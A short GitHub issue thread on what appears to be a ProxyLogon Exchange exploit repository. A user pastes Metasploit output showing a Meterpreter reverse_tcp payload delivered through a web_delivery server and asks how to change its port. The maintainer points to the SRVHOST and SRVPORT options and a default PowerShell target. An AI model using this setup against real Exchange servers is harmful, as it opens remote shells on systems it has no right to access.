### ISSUE TITLE
web_delivery

### ISSUE THREAD

**Issue by chick0n** [mekhalleh/exchange_proxylogon#2]
[+]  * yeeting windows/x64/meterpreter/reverse_tcp payload at x.x.x.x:443
[*] Using URL: http://0.0.0.0:8080/SDe4sNE
[*] Local IP: http://10.3.1.x:8080/SDe4sNE
[*] Server stopped.

How do I change the Port and IP of the web_delivery script? Its hardcoded port 8080?
Sorry...this is a more metasploit specific question...

**Comment by mekhalleh** [comment]
Hello, sorry for the response time.

You can now use `SRVHOST` and `SRVPORT`. 

But now there's no need for web delivery. You can use `Windows Powershell` as target. It's default.
